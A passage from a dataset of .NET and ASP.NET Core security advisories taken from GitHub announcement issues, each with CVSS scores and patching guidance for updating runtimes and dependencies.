NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG from FILETAG .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG updates are also available from Microsoft Update. To access this either type APITAG for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core or .NET NUMBERTAG please email details to EMAILTAG . Reports may qualify for the Microsoft .NET Core & .NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-8356",
        "Issue_Url_old": "https://github.com/dotnet/announcements/issues/73",
        "Issue_Url_new": "https://github.com/dotnet/announcements/issues/73",
        "Repo_new": "dotnet/announcements",
        "Issue_Created_At": "2018-07-10T17:00:37Z",
        "description": "Microsoft Security Advisory CVETAG : .NET Core Security Feature Bypass Vulnerability. Microsoft Security Advisory CVETAG : .NET Core Security Feature Bypass Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a security feature bypass vulnerability that exists when .NET Core does not correctly validate certificates. An attacker who successfully exploited this vulnerability could present an expired certificate when challenged. The update addresses the vulnerability by correcting how .NET Core applications handle certificate validation. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors If an application does use Windows Communication Foundation you are not affected. APITAG APITAG Affected software Any .NET Core, or ASP.NET Core based application that uses APITAG with a version of NUMBERTAG or earlier. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG APITAG Advisory FAQ APITAG APITAG How do I know if I am affected? .NET Core projects have two types of dependencies: direct and transitive. You must update your projects using the following instructions to address both types of dependency. APITAG APITAG .NET Core Project formats .NET Core has two different project file formats, depending on what software created the project NUMBERTAG APITAG is the format used in .NET Core NUMBERTAG and Microsoft Visual Studio NUMBERTAG csproj is the format used in .NET Core NUMBERTAG NET Core NUMBERTAG and Microsoft Visual Studio NUMBERTAG Direct dependencies Direct dependencies are discoverable by examining your csproj file or your APITAG file. They can be fixed by editing the project file direct dependencies or using APITAG to update the dependency. The APITAG package is not meant to be directly depended on and will not appear in your direct dependency list. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG which, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends APITAG your application gains a transitive dependency on the APITAG package. Transitive dependencies are reviewable in three ways, depending on your project format project format : In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects OR . By examining the APITAG file contained in the root directory of your project for APITAG based projects. The APITAG and APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. APITAG APITAG Fixing direct dependencies in a csproj based project / Visual Studio NUMBERTAG Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing Direct Dependencies in FILETAG based project / Visual Studio NUMBERTAG Open your APITAG file in your editor. Look for the dependencies section. Below is an example dependencies section: CODETAG This example has three direct dependencies: APITAG , APITAG and APITAG . APITAG is the platform the application targets, you should ignore this. The other packages expose their version to the right of the package name. In our example, our non platform packages are version NUMBERTAG Review your direct dependencies for any instance of the packages and versions listed above. In the example above, there is a direct dependency on a vulnerable package, APITAG version NUMBERTAG To update to the fixed package, change the version number to be the appropriate package for your release. In the example, this would be updating APITAG to NUMBERTAG After updating the vulnerable package versions, save your APITAG file. The dependencies section in our example APITAG would now look as follows: CODETAG If you are using Visual Studio and save your updated APITAG file, Visual Studio will restore the new package version. You can see the restore results by opening the Output Window APITAG and changing the Show output from drop down list to Package Manager. If you are not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore your new dependency. After you have addressed all of your direct dependencies, you must also review your transitive dependencies. After you've addressed all of your direct dependencies, you must review your transitive dependencies. Discovering and fixing transitive dependencies There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json or the the APITAG file project lock json . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG (csproj/VS NUMBERTAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages, this means either None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. APITAG APITAG Manually reviewing FILETAG APITAG Open the APITAG file in your editor. We suggest you use an editor that understands json and allows you to collapse and expand nodes to review this file; both Visual Studio and Visual Studio Code provide this functionality. If you are using Visual Studio the APITAG file is \u201cunder\u201d the APITAG file. Click the right pointing triangle, \u25b7, to the left of the APITAG file to expand the solution tree to expose the APITAG file. The following image shows a project with the APITAG file expanded to show the APITAG file. FILETAG Search the APITAG file for the vulnerable packages, using the format APITAG , using each of the package names from the table above. If you find any vulnerable assembly name in your search examine the line on which they are found, the version number is after the APITAG and compare to the vulnerable versions table above. For example a search result that shows APITAG is a reference to NUMBERTAG of APITAG . If your APITAG file includes references to any of the package versions shown above then you will need to fix the transitive dependencies. If you have not found any reference to a vulnerable version of APITAG this means none of your direct dependencies depend on any vulnerable packages or you have already fixed the problem by updating the direct dependencies. If your transitive dependency review found references to any of the vulnerable packages you must add a direct dependency to the updated package to your APITAG file to override the transitive dependency. Open your APITAG and find the dependencies section. For example: CODETAG For each of the vulnerable packages your search returned you must add a direct dependency to the updated version by adding it to the APITAG file. You do this by adding a new line to the dependencies section, referring the fixed version. For example, if your search showed a transitive reference to the vulnerable APITAG version NUMBERTAG you would add a reference to the appropriate fixed version NUMBERTAG Edit the APITAG file as follows: CODETAG After you have added direct dependencies to the fixed packages, save your APITAG file. If you are using Visual Studio save your updated APITAG file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output Window APITAG and changing the Show output from drop down list to Package Manager. If you are not using Visual Studio open a command line and change to your project directory. Execute the dotnet restore command to restore your new dependencies. Rebuilding your application Finally you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-11879",
        "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/277",
        "Issue_Url_new": "https://github.com/aspnet/announcements/issues/277",
        "Repo_new": "aspnet/announcements",
        "Issue_Created_At": "2017-11-14T15:24:44Z",
        "description": "Reserved. APITAG issue has been reserved for a potential future security announcement._ This does not mean a security advisory is coming soon, it simply gives us the ability to predict the issue number that will be used in the future.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-0602",
        "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/402",
        "Issue_Url_new": "https://github.com/aspnet/announcements/issues/402",
        "Repo_new": "aspnet/announcements",
        "Issue_Created_At": "2020-01-14T18:01:27Z",
        "description": "Microsoft Security Advisory CVETAG : ASP.NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG : ASP.NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a denial of service vulnerability exists when ASP.NET Core improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against an ASP.NET Core web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the ASP.NET Core application. The update addresses the vulnerability by correcting how the ASP.NET Core web application handles web requests. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version that is listed in affected software affected runtime or your application has a dependency on any of the packages listed in affected packages affected packages , you're exposed to the vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG or NUMBERTAG application using APITAG APITAG APITAG Affected packages Any ASP.NET Core based application that uses any of the vulnerable packages that are shown below, or any ASP.NET Core application running on .NET Core NUMBERTAG or NUMBERTAG Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG APITAG How do I fix the issue? First examine the versions of .NET Core you have installed. You can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG APITAG APITAG Updated runtimes and SDKs For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG APITAG Studio NUMBERTAG or SDK NUMBERTAG APITAG Studio NUMBERTAG from FILETAG For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG If you have multiple runtimes or SDKs installed, you must update all runtimes or SDKs separately. Once you've installed the updated runtime or SDK, restart your apps for the update to take effect. Applications targeting .NET Core runtime Update your runtime and SDKs to the versions listed in Updated runtimes and SDKs fixed runtime sdks then restart your application. Applications targeting .NET Framework First update your .NET Core runtimes and SDKs to the versions listed in Updated runtimes and SDKs fixed runtime sdks . As targeting .NET Framework adds dependencies for various packages, you must update the dependencies your application uses, recompile, and redeploy your application. Direct dependencies Direct dependencies are discoverable by examining your csproj file. They can be fixed by editing the project file fixing direct dependencies or using APITAG to update the dependency. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG that, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends APITAG your application gains a transitive dependency on the APITAG package. Transitive dependencies are reviewable in two ways: In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects The APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json) . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you haven't found any reference to any vulnerable packages, this means one of the following: None of your direct dependencies depend on any vulnerable packages. You have already fixed the problem by updating the direct dependencies. APITAG APITAG Fixing Dependencies APITAG APITAG Fixing direct dependencies Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing transitive dependencies If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Finally, you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgments Tom Deseyn of FILETAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-24464",
        "Issue_Url_old": "https://github.com/dotnet/announcements/issues/212",
        "Issue_Url_new": "https://github.com/dotnet/announcements/issues/212",
        "Repo_new": "dotnet/announcements",
        "Issue_Created_At": "2022-03-08T18:31:46Z",
        "description": "Microsoft Security Advisory CVETAG | .NET Denial of Service Vulnerability. Microsoft Security Advisory CVETAG | .NET Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET NUMBERTAG NET NUMBERTAG and .NET CORE NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a Denial of Service vulnerability, which exists in .NET NUMBERTAG NET NUMBERTAG and .NET CORE NUMBERTAG when parsing certain types of http form requests. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET NUMBERTAG application running on .NET NUMBERTAG or lower Any .NET NUMBERTAG application running on .NET NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please install the latest version of .NET NUMBERTAG NET NUMBERTAG and .NET Core NUMBERTAG If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs. You can list the versions you have installed by running the APITAG command. You should see an output like the following: ERRORTAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG APITAG from FILETAG .NET NUMBERTAG and .NET NUMBERTAG updates are also available from Microsoft Update. To access this either type APITAG for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET NUMBERTAG or .NET NUMBERTAG please email details to EMAILTAG . Reports may qualify for the Microsoft .NET Core & .NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgement Lars Eidnes URLTAG with FILETAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-34485",
        "Issue_Url_old": "https://github.com/dotnet/announcements/issues/196",
        "Issue_Url_new": "https://github.com/dotnet/announcements/issues/196",
        "Repo_new": "dotnet/announcements",
        "Issue_Created_At": "2021-08-10T21:53:06Z",
        "description": "Microsoft Security Advisory CVETAG | .NET Core Information Disclosure Vulnerability. Microsoft Security Advisory CVETAG | .NET Core Information Disclosure Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. An information disclosure vulnerability exists in .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG when dumps created by the tool to collect crash dumps and dumps on demand are created with global read permissions on Linux and APITAG Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET NUMBERTAG application running on .NET NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please install the latest version of .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You should see an output like the following: ERRORTAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG from FILETAG .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG updates are also available from Microsoft Update. To access this either type APITAG for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core or .NET NUMBERTAG please email details to EMAILTAG . Reports may qualify for the Microsoft .NET Core & .NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-34485",
        "Issue_Url_old": "https://github.com/github/advisory-database/issues/741",
        "Issue_Url_new": "https://github.com/github/advisory-database/issues/741",
        "Repo_new": "github/advisory-database",
        "Issue_Created_At": "2022-10-12T20:44:32Z",
        "description": ".NET CVE backfill round NUMBERTAG Hello, Please find the next batch of .NET CVEs for backfill below. //cc MENTIONTAG MENTIONTAG CVE | Announcement date | CVE URL | Announcement URL | APITAG Advisory | Vulnerable package id | Vulnerable version range | Fixed in version | | | | | | | CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | 